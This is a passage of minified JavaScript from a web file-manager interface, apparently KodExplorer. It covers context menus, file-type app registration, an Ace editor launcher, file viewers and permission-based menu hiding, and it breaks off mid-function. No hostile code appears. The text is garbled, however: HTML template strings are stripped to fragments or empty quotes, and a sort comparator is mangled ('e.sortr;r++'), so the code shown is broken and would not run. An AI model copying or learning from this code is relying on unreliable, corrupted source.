[data-id="'+r+'"]').click()}s.inScreen()||o.animate({scrollTop:s.offset().top-o.offset().top+o.scrollTop()},100),s.find("[name]").first().focus(),s.find(".setting-content").flash(3,100)}return{checked:0==a.length,error:a,result:e}},v=function(t){e.async(t,function(e){e&&($.isFunction(e)?e():"object"==typeof e&&e.hasOwnProperty("main")&&$.isFunction(e.main)&&e.main())})},g=function(e){if("string"==typeof e)return v(file),!1;if($.isPlainObject(e.formStyle)&&e.formStyle.loadFile){var t=e.formStyle.loadFile;"string"==typeof t&&(t=[t]),$.isArray(t)&&$(t).each(function(e,t){v(t)})}i=e,a=UUID();var n=template.compile(tplFormMake),o=n({LNG:LNG,items:e,wrapID:a});return o},b=function(e,t,a){var i=g(e);if(!i)return!1;var n={padding:0,fixed:!0,resize:!0,title:LNG.search,ico:core.icon("config"),width:680,height:500,content:i,okVal:LNG.button_save,ok:function(){var e=m();return e.checked?a(e.result):!1}};if($.isPlainObject(t))for(var s in t)n[s]=t[s];var r=$.dialog(n),l=r.DOM.wrap.find(".aui-title").html();return r.DOM.wrap.find(".modal-title").html(l),o(),r};return{makeHtml:g,bindEvent:o,getFormData:m,initDialog:b}}),define("app/common/rightMenuExtence",[],function(){$.contextMenu||($.contextMenu={}),$.contextMenu.show=function(e,t,a){e&&($.contextMenu.hidden(),$(e).contextMenu({x:t,y:a}))},$.contextMenu.menuShow=function(){var e=$(".context-menu-active"),t=e.data("contextMenu");if(e&&t){var a=t.$menu,i="disable";a.find(".disable").addClass(i),Hook.trigger("rightMenu.show",t.selector,e,a),Hook.trigger("rightMenu.show"+t.selector,e,a)}},$.contextMenu.isDisplay=function(){return 0==$(".context-menu-list:visible").length?!1:!0},$.contextMenu.hidden=function(){$(".context-menu-list").filter(":visible").filter(":not(.menu-not-auto-hidden)").trigger("contextmenu:hide")},$.contextMenu.menuAdd=function(e,t,a,i){var n=!1,o=$.contextMenu.menus;for(var s in o)if(o[s].selector==t){n=o[s];break}if(n&&e){var r=function(e){return e?-1!==e.indexOf("/")?'':'':""},l=function(e,t,a,i){var o=[],s={};if(a){for(var c in t)o.push({key:c,value:t[c]});for(var d=o.length-1;d>=0;d--)s[o[d].key]=o[d].value}else s=t;$.each(s,function(t,o){o.className=o.className||"";var s=t+" "+o.className;if("string"==typeof o)var c='
    • ';else{var d=o.name;o.accesskey&&(d+='('+o.accesskey+")");var c='
    • '+r(o.icon)+""+d+"
    • "}var p=$(c).clone();a?e.$menu.find(a).first().after(p):i&&e.$menu.find(i).first().before(p);var u=p.parent(".context-menu-list").data("contextMenu");p.data({contextMenu:u,contextMenuKey:t,contextMenuRoot:n}); +var f={$input:null,$label:null,accesskey:o.accesskey,className:o.className,icon:o.icon,name:o.name,_name:d,$node:p};if(u&&(u.items||(u.items={}),u.items[t]=f),"string"!=typeof o&&(e.commands||(e.commands={}),e.commands[t]=f,n.commands[t]=f,n.callbacks[t]=function(e,t){o.callback(e,t)},o.accesskey&&(n.accesskeys[o.accesskey]=f),o.items)){var c='
      ';$(c).appendTo(p),f.$menu=p.find("ul."+t),f.callback=null,f.appendTo=f.$node,f.type="sub",p.data("contextMenu",f).addClass("context-menu-submenu"),p.find("ul."+t).data({contextMenuRoot:n,contextMenu:f}),p.find("li."+t+"-first").data({contextMenuRoot:n,contextMenuKey:t+"-first",contextMenu:f}),f.items||(f.items={}),f.items[t+"-first"]={$input:null,$label:null,icon:"",name:"",_name:"",$node:p.find("li."+t+"-first")},l(f,o.items,"."+t+"-first")}})};l(n,e,a,i)}};var e=function(){return $('').appendTo("#rightMenu"),"function"!=typeof $.contextMenu?console.info("$.contextMenu is not function!"):($.contextMenu({zIndex:9999,selector:".dialog-menu",items:{"dialog-quit":{name:LNG.close,className:"dialog-quit",icon:"remove",accesskey:"q"},"dialog-max":{name:LNG.dialog_max,className:"dialog-max",icon:"resize-full",accesskey:"a"},"dialog-min":{name:LNG.dialog_min,className:"dialog-min",icon:"minus",accesskey:"i"},sep1:"--------",refresh:{name:LNG.refresh,className:"refresh",icon:"refresh",accesskey:"r"},"open-window":{name:LNG.open_ie,className:"open-window",icon:"globe",accesskey:"b"},qrcode:{name:LNG.qrcode,className:"qrcode",icon:"qrcode",accesskey:"c"}},callback:function(e,t){var a=t.$trigger.attr("id"),i=$.dialog.list[a];switch(e){case"dialog-quit":i.close();break;case"dialog-min":i._clickMin(!1);break;case"dialog-max":i._clickMax();break;case"refresh":i.refresh();break;case"open-window":i.openWindow();break;case"qrcode":core.qrcode(i.DOM.wrap.find("iframe").attr("src"));break;default:}}}),$(".aui-title img,.aui-title .x-item-file").die("click").live("click",function(e){var t=$(this).offset();t.top+=$(this).outerHeight(),$(this).parent().parent().contextMenu({x:e.pageX,y:t.top})}).die("dblclick").live("dblclick",function(){var e=$(this).parent().parent().attr("id"),t=$.dialog.list[e];t.close(),$.contextMenu.hidden()}),void 0)};Hook.bind("rightMenu.show.dialog-menu",function(e,t){var a=e.attr("id"),i=$.dialog.list[a],n="hidden",o=".open-window,.refresh,.qrcode,.context-menu-separator";i.hasFrame()?t.find(o).removeClass(n):t.find(o).addClass(n);var s=".dialog-min,.dialog-max";$("."+a).hasClass("dialog-can-resize")?t.find(s).removeClass(n):t.find(s).addClass(n)}),e()}),define("app/app/appBase",[],function(){var e={},t={},a={},i=!1,n=function(a){a.title=void 0==a.title?a.name:a.title,void 0==a.name&&(a.name=UUID(),a.hidden=!0),e[a.name]=a,a.ext||(a.ext="");var i=a.ext.split(",");e[a.name].extArr=i;for(var n=0;i.length>n;n++){var o=trim(i[n]);e[a.name].extArr[n]=o,t[o]||(t[o]=[]);for(var s=!1,r=0;t[o].length>r;r++)if(t[o][r].name==a.name){s=!0;break}if(!s){var l=0;a.sort!==void 0&&(l=parseInt(a.sort)),t[o].push({name:a.name,sort:l}),t[o].length>1&&(t[o]=t[o].sort(function(e,t){return e.sortr;r++)o[r].name!=i&&s.push(o[r]);0==s.length?delete t[n]:t[n]=s}},r=function(i){if(i===void 0){var n=[];for(var o in e)e[o].hidden||n.push(e[o]);return n}var s=a[i],n=[];if(!s&&!t[i])return!1;if(s&&(e[s]?n.push(e[s]):delete a[i]),!t[i])return n;for(var r=0;t[i].length>r;r++){var l=t[i][r].name;e[l]&&l!=s&&n.push(e[l])}return n},l=function(e){i=e},c=function(){return i},d=function(t,a,i){a=a?a:core.pathExt(t),i=i?i:"";var n={path:t,ext:a,appName:i};if(!Hook.trigger("kodApp.open.before",n)){if(t=n.path,a=n.ext,i=n.appName)var o=e[i];else{var s=r(a);if(!s||0==s.length)return kodApp.openUnknow(t,""),void 0;var o=s[0]}if(!o)return Tips.tips("["+i+"] not exists",!1);try{o.callback(t,a),Hook.trigger("kodApp.open.after",t,a,o)}catch(l){kodApp.openUnknow(t,""),console.error("kodApp.open error:",l)}}},p=function(t){var a=r(t),i=r("");""==t&&(a=!1),a?a.push({name:""}):a=[],a=a.concat(i);for(var n={},o=0;a.length>o;o++){var s=a[o];""==s.name||s.hidden?n["step-line"]="-------":n[s.name]={app:s.name,name:s.title,className:s.className,icon:s.icon,callback:function(t){var a=e[t];if(a&&a.callback){if($(".context-menu-active"),$(".context-menu-active").hasClass("menu-tree-file"))var i=ui.tree.makeParam();else var i=ui.path.makeParam();a.callback(i.path,i.type)}}}}return n},u=function(e,t){f(e,t),G.userConfig.kodAppDefault=htmlEncode(jsonEncode(a)),G.shareInfo||$.get(G.appHost+"setting/set&k=kodAppDefault&v="+jsonEncode(a))},f=function(t,i){if("string"==typeof t)a[t]=i;else if($.isArray(t))for(var n=0;t.length>n;n++)a[t[n]]=i;else if(e[i]&&$.isArray(e[i].extArr))for(var o=e[i].extArr,n=0;o.length>n;n++)a[o[n]]=i},h=function(){G.userConfig.kodAppDefault="[]",a={}},m=function(t,a){var t=e[t];return t?a?inArray(t.extArr,a):t.ext:!1},v=function(a,i,n){var a=e[a];if(!a)return!1;var o="undefined"==n?0:parseInt(n);0==o&&a.sort!==void 0&&(o=parseInt(a.sort)),"string"==$.type(i)&&(i=i.split(","));for(var s=0;i.length>s;s++){var r=i[s];if(r){inArray(a.extArr,r)||a.extArr.push(r),t[r]||(t[r]=[]);for(var l=!1,c=0;t[r].length>c;c++)t[r][c].name!=a.name||(t[r][c].sort=o,l=!0);l||t[r].push({name:a.name,sort:o})}}},g=function(){if(G.userConfig&&G.userConfig.kodAppDefault)try{var e=G.userConfig.kodAppDefault;e=jsonDecode(htmlDecode(e)),$.isPlainObject(e)&&(a=e)}catch(t){}Hook.bind("rightMenu.show.menu-file,rightMenu.show.menu-tree-file",function(e,t){if(e.hasClass("menu-tree-file"))var a=ui.tree.makeParam();else var a=ui.path.makeParam();var i=core.pathExt(a.path),n="hidden";if(kodApp.getApp(i)){var o=kodApp.getAppMenu(i);t.find("li.open-with.context-menu-submenu").removeClass(n),t.find("ul.context-menu-list.open-with .context-menu-item").not(".open-with-first").remove(),$.contextMenu.menuAdd(o,".menu-file",".open-with-first"),$.contextMenu.menuAdd(o,".menu-tree-file",".open-with-first")}else t.find("li.open-with.context-menu-submenu").addClass(n)}),Hook.trigger("kodApp.ready")};return g(),{debug:function(){return{appList:e,openDefault:t,openUser:a}},add:n,remove:s,appSupportCheck:m,appSupportSet:v,getApp:r,getAppBind:o,getAppMenu:p,setLastOpenTarget:l,getLastOpenTarget:c,setOpenUser:u,setOpenUserLocal:f,clearOpenUser:h,open:d}}),define("app/app/editor",[],function(){kodApp.add({name:"aceEditor",title:LNG["Plugin.default.aceEditor"],sort:0,ext:"txt,textile,oexe,inc,csv,log,asc,tsv,lnk,url,webloc,meta,localized,xib,xsd,storyboard,plist,csproj,pch,pbxproj,local,xcscheme,manifest,vbproj,strings,jshintrc,sublime-project,readme,changes,changelog,version,license,changelog,abap,abc,as,asp,aspx,ada,adb,htaccess,htgroups,htgroups,htpasswd,asciidoc,adoc,asm,a,ahk,bat,cmd,cpp,c,cc,cxx,h,hh,hpp,ino,c9search_results,cirru,cr,clj,cljs,cbl,cob,coffee,cf,cson,cakefile,cfm,cs,css,curly,d,di,dart,diff,patch,dockerfile,dot,dummy,dummy,e,ge,ejs,ex,exs,elm,erl,hrl,frt,fs,ldr,ftl,gcode,feature,.gitignore,glsl,frag,vert,gbs,go,groovy,haml,hbs,handlebars,tpl,mustache,hs,hx,html,hta,htm,xhtml,eex,html.eex,erb,rhtml,html.erb,ini,inf,conf,cfg,prefs,io,jack,jade,java,ji,jl,jq,js,jsm,json,jsp,jsx,latex,ltx,bib,lean,hlean,less,liquid,lisp,ls,logic,lql,lsl,lua,lp,lucene,Makefile,makemakefile,gnumakefile,makefile,ocamlmakefile,make,md,markdown,mask,matlab,mz,mel,mc,mush,mysql,nc,nix,nsi,nsh,m,mm,ml,mli,pas,p,pl,pm,pgsql,php,phtml,shtml,php3,php4,php5,phps,phpt,aw,ctp,module,ps1,praat,praatscript,psc,proc,plg,prolog,properties,proto,py,r,cshtml,rd,rhtml,rst,rb,ru,gemspec,rake,guardfile,rakefile,gemfile,rs,sass,scad,scala,scm,sm,rkt,oak,scheme,scss,sh,bash,bashrc,sjs,smarty,tpl,snippets,soy,space,sql,sqlserver,styl,stylus,svg,swift,tcl,tex,toml,twig,swig,ts,typescript,str,vala,vbs,vb,vm,v,vh,sv,svh,vhd,vhdl,wlk,wpgm,wtest,xml,rdf,rss,wsdl,xslt,atom,mathml,mml,xul,xbl,xaml,xq,yaml,yml,vcproj,vcxproj,filters,cer,reg,config,pem,srt,ass,lrc,opf,ncx",icon:G.staticPath+"images/file_icon/icon_app/ace.png",callback:function(e){var t=ShareData.frameTop();if(t.Editor!==void 0)return t.Editor.add(urlEncode(e)),void 0;if(core.isApp("editor"))return ShareData.frameChild("OpenopenEditor",function(t){t.Editor.add(urlEncode(e))}),void 0;if(ShareData.frameTop("OpenopenEditor")){var a=t.$.dialog.list.openEditor,i=0;a&&"hidden"==$(a.DOM.wrap).css("visibility")&&(i=200,a.display(!0).zIndex().focus()),setTimeout(function(){ShareData.frameTop("OpenopenEditor",function(t){t.Editor.add(urlEncode(e))})},i)}else{var n=G.appHost+"editor/edit#filename="+urlEncode(e);G.sharePage!==void 0&&(n=G.appHost+"share/edit&user="+G.user+"&sid="+G.sid+"#filename="+urlEncode(e));var o=htmlEncode(urlDecode(core.pathThis(e)));core.openDialog(n,core.icon("edit"),o,"openEditor")}}});var e=ShareData.frameTop();e.Config&&"editor"==e.Config.pageApp&&kodApp.setOpenUserLocal(!1,"aceEditor")}),define("app/app/openWith",[],function(){kodApp.add({name:"appOpenSetting",title:LNG["Explorer.UI.appSetDefault"],ext:"",icon:G.staticPath+"images/file_icon/icon_others/setting.png",callback:function(e,t){var a="
      ",i=kodApp.getApp(t),n=!1;_.isArray(i)&&(n=i[0].name);var o=template.compile(a),s=o({LNG:LNG,apps:i,defaultApp:n,appAll:kodApp.getApp()}),r=$.dialog({id:"dialog-app-select",className:"menu-empty",padding:0,fixed:!0,ico:core.icon("search"),resize:!0,title:LNG["Explorer.UI.selectAppDesc"],width:480,height:360,padding:"20px",content:s,ok:function(){return l()}}),l=function(){var a=$("#app-default-checkbox").prop("checked"),i=$(".app-list.active .app-item.select").attr("data-app");return i?(r.close(),kodApp.open(e,t,i),a&&kodApp.setOpenUser(t,i),!0):(Tips.tips(LNG["Explorer.UI.selectAppWarning"],"warning"),!1)};$(".tab-group .tab-item").die("click").live("click",function(){var e=$(this).find("[aria-controls]").attr("aria-controls");"app-list-support"==e?$("#app-default-checkbox").prop("checked",!0):$("#app-default-checkbox").prop("checked",!1)}),$(".app-item").die("click").live("click",function(){$(this).parent().find(".select").removeClass("select"),$(this).addClass("select")}).die("dblclick").live("dblclick",function(){l()})}})}),define("app/app/html",[],function(){var e=function(e){return void 0==e?!1:0===e.indexOf("http")?!0:G.shareInfo||core.pathReadable(e)?!0:(Tips.tips(LNG.no_permission_read_all,!1),core.playSound("error"),!1)};Hook.bind("kodApp.open.before",function(t){return"folder"==t.ext?(core.isApp("explorer")||isWap()?ui.path.list(t.path+"/"):core.explorer(t.path),!0):e(t.path)?("file"==t.ext&&(t.ext=""),void 0):!0}),kodApp.openUnknow=function(e,t){void 0==t&&(t="");var a=G.appHost+"pluginApp/index&search="+core.pathExt(e),i="kodApp.open(pathHashDecode('"+pathHashEncode(e)+"'),false,'appOpenSetting');",n="kodApp.open(pathHashDecode('"+pathHashEncode(e)+"'),false,'aceEditor');",o="kodApp.download(pathHashDecode('"+pathHashEncode(e)+"'));",s="core.openWindow('"+a+"');",r=LNG.unknow_file_try+'
      '+LNG.unknow_file_tips+"
      "+t+'
      2.'+r+n+'">'+LNG["Explorer.UI.openWithText"]+'
      3.'+r+o+'">'+LNG.unknow_file_download+'
      '+r+s+'">'+LNG.PluginCenter+""+LNG.unknow_plugin_search+"
      ";$.dialog({fixed:!0,icon:"warning",title:LNG.unknow_file_title,padding:"20px 50px",content:l,cancel:!0}),$(".unknow-file a").unbind("click").bind("click",function(e){return $(this).parents(".artDialog").data("artDialog").close(),stopPP(e)})},kodApp.add({name:"download",title:LNG.download,hidden:!0,icon:"x-item-file x-html",callback:function(t){if(e(t)){var a=t;"http"!=t.substr(0,4)&&(a=G.appHost+"explorer/fileDownload&accessToken="+G.accessToken+"&path="+urlEncode(t),G.sharePage!==void 0&&(a=G.appHost+"share/fileDownload&user="+G.user+"&sid="+G.sid+"&path="+urlEncode(t))),$.dialog({icon:"succeed",title:!1,time:1.5,content:LNG.download_ready+"..."}),isWap()?window.open(a):$('').appendTo("body")}}}),kodApp.download=function(e){kodApp.open(e,"","download")},kodApp.openWindow=function(e){kodApp.open(e,"","browserOpen")},kodApp.add({name:"browserOpen",title:LNG.open_ie,sort:-100,icon:"x-item-file x-html",callback:function(t){if(e(t)){var a=core.path2url(t);isWap()?window.location.href=a:window.open(a)}}}),kodApp.add({name:"swfPlayer",title:"Flash Player",ext:"swf",icon:"x-item-file x-swf",callback:function(e,t){$.dialog({resize:!0,fixed:!0,ico:core.icon(t),title:core.pathThis(e),width:"75%",height:"65%",padding:0,content:core.createFlash(core.path2url(e))})}}),kodApp.add({name:"webLink",title:"webLink",ext:"url,webloc",sort:10,icon:"x-item-file x-html",callback:function(e,t){core.fileGet(e,function(a){if("url"==t){var i=a.match(/URL=(.*)/);if(i.length>=2)return window.open(i[1])}else if("webloc"==t)try{var n=$($.parseXML(a)),o=n.find("string").text();return window.open(o),void 0}catch(s){}kodApp.open(e,t,"editor")})}}),kodApp.add({name:"htmlView",title:LNG["Plugin.default.htmlView"],ext:"htm,html,shtml",sort:10,icon:"x-item-file x-html",callback:function(e){var t=core.path2url(e);core.openDialog(t,core.icon("html"),core.pathThis(e))}}),kodApp.add({name:"pdfView",title:"PDF Simple",ext:"pdf",sort:-1,icon:"x-item-file x-pdf",callback:function(e,t){var a=core.path2url(e),i="pdf"+UUID(),n='";$.dialog({resize:!0,fixed:!0,ico:core.icon(t),title:core.pathThis(e),width:"80%",height:"75%",padding:0,content:n}),PDFObject.embed(a,"#"+i)}}),kodApp.add({name:"oexeOpen",title:LNG["kodApp.oexe.open"],ext:"oexe",sort:100,icon:" x-item-file x-oexe",callback:function(e){core.fileGet(e,function(t){var a=jsonDecode(t);a.name=core.pathThis(e),core.openApp(a)})}}),kodApp.add({name:"oexeEdit",title:LNG["kodApp.oexe.edit"],ext:"oexe",sort:50,icon:"icon-edit ",callback:function(e){core.fileGet(e,function(t){var a=jsonDecode(t);a.name=core.pathThis(e),a.path=e,ui.path.pathOperate.appEdit(a)})}});var t={createApp:{name:LNG.app_create,className:"createApp newfile",icon:"icon-puzzle-piece x-item-file x-oexe",callback:function(){ui.path.pathOperate.appEdit(0,0,"userAdd")}}};$.contextMenu.menuAdd(t,".menu-body-main",".app-install"),$.contextMenu.menuAdd(t,".toolbar-path-more",".app-install"),$.contextMenu.menuAdd(t,".bodymain",".app-install"),Hook.bind("rightMenu.show",function(e,t,a){var i=[".menu-folder",".menu-file",".menu-tree-folder",".menu-tree-file",".menu-tree-folder-fav"];if(a.find(".context-menu-submenu").fadeOut(0).delay(0).fadeIn(0),a.removeClass("menu-auto-fit"),a.inScreen()||a.addClass("menu-auto-fit"),".menu-body-main"==e){var n=a.find(".set-file-icon-size.context-menu-submenu");"icon"==G.userConfig.listType?n.removeClass("hidden"):n.addClass("hidden")}if(_.include(i,e)){var o="disabled",s=".cute,.rname,.remove",r=".open,.open-text,.down,.share,.copy,.cute,.rname,.remove,.open-browser,.search,.more-action";t.hasClass("file-not-readable")?a.find(r).addClass(o):a.find(r).removeClass(o),t.hasClass("file-not-writeable")?a.find(s).addClass(o):a.find(s).removeClass(o)}}),Hook.bind("rightMenu.show.menu-body-main",function(e,t){var a=".upload,.past,.newfolder,.newfile",i="disabled";G.jsonData&&G.jsonData.info.canUpload?t.find(a).removeClass(i):t.find(a).addClass(i)}),Hook.bind("rightMenu.show.menu-file",function(e,t){if($(".context-menu-active").hasClass("menu-tree-file"))var a=ui.tree.makeParam();else var a=ui.path.makeParam();var i=core.pathExt(a.path),n="hidden";inArray(["jpg","jpeg","png"],i)?t.find(".set-background").removeClass(n):t.find(".set-background").addClass(n)});var a=function(){var e=".close-item,.refresh,.newfile,.past,.info",t=".open-browser",a=".explorer,.create-project,.open-project",i=".close-item,.newfile,.refresh,.past,.down,.copy,.cute,.remove,.more-action,.clone,.info,.zip,.zip-zip,.zip-tar,.zip-tgz",n=".newfile,.cute,.past,.rname,.zip,.remove,.clone,.create-link-home,.create-link,.create-project",o=$(".menu-tool-path"),s="disabled",r=ui.fileLight.fileListSelect();o.find(".context-menu-item").addClass(s),0==r.length?o.find(e).removeClass(s):1==r.length?(o.find(".context-menu-item").removeClass(s),"folder"==ui.fileLight.type(r)?o.find(t).addClass(s):o.find(a).addClass(s)):r.length>1&&o.find(i).removeClass(s),G.jsonData&&G.jsonData.info&&G.jsonData.info.canUpload===!1&&o.find(n).filter(":not(."+s+")").addClass(s)};Hook.bind("explorer.fileSelect.init",function(){ui.fileLight.listNumberSet()}),Hook.bind("explorer.fileSelect.change",function(){a(),ui.fileLight.selectNumSet()}),Hook.bind("rightMenu.show.toolbar-path-more",function(){a()}),Hook.bind("rightMenu.initFinished",function(){if(1!=G.isRoot){var e="hidden";if(core.authCheck("explorer.fileDownload")||(kodApp.remove("browserOpen"),$(".context-menu-list .down,.context-menu-list .download").addClass(e),$(".context-menu-list .share").addClass(e),$(".context-menu-list .open-text").addClass(e),$(".pathinfo .open-window").addClass(e),$(".context-menu-list .open-browser").addClass(e)),core.authCheck("explorer.search")||$(".context-menu-list .search").addClass(e),core.authCheck("explorer.mkdir")||$(".context-menu-list .newfolder").addClass(e),core.authCheck("userShare.set")||$(".context-menu-list .share").remove(),core.authCheck("explorer.mkfile")||$(".context-menu-list .newfile,.tool-path-newfile").addClass(e),core.authCheck("explorer.mkdir")||$(".context-menu-list .newfolder,[data-action=newfolder]").addClass(e),core.authCheck("explorer.pathCopy")||($(".context-menu-list .cute").addClass(e),$(".context-menu-list .copy").addClass(e)),!core.authCheck("explorer.fileUpload")){$(".context-menu-list .upload").addClass(e);var t=$("[data-action=upload-more]");t.exists()&&t.parent().addClass(e)}}})}),define("app/common/tpl/copyright.html",[],'\n'),define("app/common/tpl/themeDIY.html",[],"@media screen and (max-width:100000px) {\n body .full-background{\n position: absolute;top: 0px;left: 0px;bottom: 0px;right: 0px;\n background-color: #020202;background-size: 100% 100%;\n }\n\n {{if blurSize= (bgBlur==0?0:10) }}{{/if}}\n body .full-background:before{\n -webkit-filter: blur({{blurSize}}px);\n -moz-filter: blur({{blurSize}}px);\n -ms-filter: blur({{blurSize}}px);\n filter: blur({{blurSize}}px);\n }\n {{if bgType == 'image'}}\n body .full-background,\n body .full-background:before,\n body #body .menu-left,\n body #body .app-menu-left,\n body .aui-buttons,\n body .aui-state-focus .aui-title,body .aui-title{\n background-image:url({{bgImage}});\n }\n body .aui-state-focus .aui-title,body .aui-title{\n background-size:100%;\n }\n {{else}}\n body .full-background,\n body .full-background:before,\n body #body .menu-left, \n body #body .app-menu-left,\n body .aui-buttons,\n body .aui-state-focus .aui-title,body .aui-title{\n background:{{endColor}};\n filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='{{startColor}}', endColorstr='{{endColor}}');\n background-image: -webkit-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -moz-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -o-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -ms-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n }\n {{/if}}\n}\n"),define("app/shareCommon/rightMenu",[],function(){var e=".menu-file",t=".menu-folder",a=".menu-more",i=".menu-tree-root",n=".menu-tree-folder",o=".menu-tree-file",s={"list-icon":{name:LNG.list_type,icon:"eye-open",items:{"set-icon":{name:LNG.list_icon,className:"menu-set-icon set-icon"},"set-list":{name:LNG.list_list,className:"menu-set-icon set-list"}}},"sort-by":{name:LNG.order_type,accesskey:"y",icon:"sort",items:{"set-sort-name":{name:LNG.name,className:"menu-set-sort set-sort-name"},"set-sort-ext":{name:LNG.type,className:"menu-set-sort set-sort-ext"},"set-sort-size":{name:LNG.size,className:"menu-set-sort set-sort-size"},"set-sort-mtime":{name:LNG.modify_time,className:"menu-set-sort set-sort-mtime"},sep105:"--------","set-sort-up":{name:LNG.sort_up,className:"menu-set-desc set-sort-up"},"set-sort-down":{name:LNG.sort_down,className:"menu-set-desc set-sort-down"}}},"set-file-icon-size":{name:LNG.file_size_title,icon:"picture",className:"set-file-icon-size",items:{"box-size-smallx":{name:LNG.file_size_small_super,className:"file-icon-size box-size-smallx"},"box-size-small":{name:LNG.file_size_small,className:"file-icon-size box-size-small"},"box-size-default":{name:LNG.file_size_default,className:"file-icon-size box-size-default"},"box-size-big":{name:LNG.file_size_big,className:"file-icon-size box-size-big"},"box-size-bigx":{name:LNG.file_size_big_super,className:"file-icon-size box-size-bigx"}}}},r=function(){$('').appendTo("body"),$(".context-menu-list").die("click").live("click",function(e){return stopPP(e),!1}),c(),d(),p(),u(),m(),v(),k(),y(),$(".set-set-"+G.userConfig.listType).addClass("selected"),$(".set-sort-"+G.userConfig.listSortField).addClass("selected"),$(".set-sort-"+G.userConfig.listSortOrder).addClass("selected"),$(".context-menu-root").addClass("animated fadeIn")},l=function(){$('').appendTo("body"),$(".context-menu-list").die("click").live("click",function(e){return stopPP(e),!1}),m(),k(),g(),b(),y(),$(".context-menu-root").addClass("animated fadeIn")},c=function(){$.contextMenu({selector:".menu-body-main",className:"file-continer-menu",zIndex:9999,callback:function(e,t){f(e,t)},items:{refresh:{name:LNG.refresh+"F5",className:"refresh",icon:"refresh",accesskey:"e"},sep1:"--------","list-icon":s["list-icon"],"sort-by":s["sort-by"],"set-file-icon-size":s["set-file-icon-size"],sep10:"--------",info:{name:LNG.info+"Alt+I",className:"info",icon:"info",accesskey:"i"}}})},d=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:t,className:t.substr(1),callback:function(e){h(e)},items:{open:{name:LNG.open+"Enter",className:"open",icon:"folder-open-alt",accesskey:"o"},down:{name:LNG.download,className:"down",icon:"download",accesskey:"x"},sep1:"--------",search:{name:LNG.search_in_path+"Ctrl+F",className:"search",icon:"search",accesskey:"s"},"open-project":{name:LNG.openProject,className:"open-project",icon:"edit"},sep2:"--------",info:{name:LNG.info+"Alt+I",className:"info",icon:"info",accesskey:"i"}}})},p=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:e,className:e.substr(1),callback:function(e){h(e)},items:{open:{name:LNG.open+"Enter",className:"open",icon:"external-link",accesskey:"o"},"open-with":{name:LNG.open_with,icon:"external-link",className:"open-with",accesskey:"a",items:{"open-with-first":{name:"",className:"hidden open-with-first"}}},down:{name:LNG.download,className:"down",icon:"download",accesskey:"x"},"show-file":{name:LNG.show_file,className:"show-file",icon:"globe",accesskey:"b"},sep1:"--------",info:{name:LNG.info+"Alt+I",className:"info",icon:"info",accesskey:"i"}}})},u=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:a,className:a.substr(1),callback:function(e){h(e)},items:{down:{name:LNG.download,className:"down",icon:"download",accesskey:"x"},sep1:"--------",info:{name:LNG.info,className:"info",icon:"info",accesskey:"i"}}})},f=function(e){switch(e){case"refresh":ui.f5(!0,!0);break;case"set-icon":ui.setListType("icon");break;case"set-list":ui.setListType("list");break;case"set-sort-name":ui.setListSort("name",0);break;case"set-sort-ext":ui.setListSort("ext",0);break;case"set-sort-size":ui.setListSort("size",0);break;case"set-sort-mtime":ui.setListSort("mtime",0);break;case"set-sort-up":ui.setListSort(0,"up");break;case"set-sort-down":ui.setListSort(0,"down");break;case"info":ui.path.info();break;case"box-size-smallx":ui.setFileIconSize(40);break;case"box-size-small":ui.setFileIconSize(60);break;case"box-size-default":ui.setFileIconSize(80);break;case"box-size-big":ui.setFileIconSize(150);break;case"box-size-bigx":ui.setFileIconSize(220);break;case"open":ui.path.open();break;default:}},h=function(e){switch(e){case"open":ui.path.open();break;case"down":ui.path.download();break;case"search":ui.path.search();break;case"show-file":ui.path.shareFile();break;case"open-project":ui.path.openProject();break;case"info":ui.path.info();break;default:}},m=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:i,callback:function(e){x(e)},items:{download:{name:LNG.download,className:"down",icon:"download",accesskey:"x"},sep2:"--------",info:{name:LNG.info,className:"info",icon:"info",accesskey:"i"}}})},v=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:n,callback:function(e){x(e)},items:{download:{name:LNG.download,className:"down",icon:"download",accesskey:"x"},sep1:"--------",search:{name:LNG.search_in_path,className:"search",icon:"search",accesskey:"s"},explorer:{name:LNG.manage_folder,className:"explorer",icon:"laptop",accesskey:"v"},"open-project":{name:LNG.openProject,className:"open-project",icon:"edit"},sep2:"--------",info:{name:LNG.info,className:"info",icon:"info",accesskey:"i"}}})},g=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:n,callback:function(e){x(e)},items:{download:{name:LNG.download,className:"down",icon:"download",accesskey:"x"},sep1:"--------",search:{name:LNG.search_in_path,className:"search",icon:"search",accesskey:"s"},explorer:{name:LNG.manage_folder,className:"explorer",icon:"laptop",accesskey:"v"},"open-project":{name:LNG.openProject,className:"open-project",icon:"edit"},sep2:"--------",info:{name:LNG.info,className:"info",icon:"info",accesskey:"i"}}})},b=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:o,callback:function(e){x(e)},items:{open:{name:LNG.open,className:"open",icon:"external-link",accesskey:"o"},"open-with":{name:LNG.open_with,icon:"external-link",className:"open-with",accesskey:"a",items:{"open-with-first":{name:"",className:"hidden open-with-first"}}},download:{name:LNG.download,className:"download",icon:"download",accesskey:"x"},"show-file":{name:LNG.show_file,className:"show-file",icon:"globe",accesskey:"b"},sep1:"--------",info:{name:LNG.info,className:"info",icon:"info",accesskey:"i"}}})},y=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:".menu-taskbar",items:{"quit-others":{name:LNG.close_others,className:"quit-others",icon:"remove-circle",accesskey:"o"},quit:{name:LNG.close,className:"quit",icon:"remove",accesskey:"q"}},callback:function(e,t){var 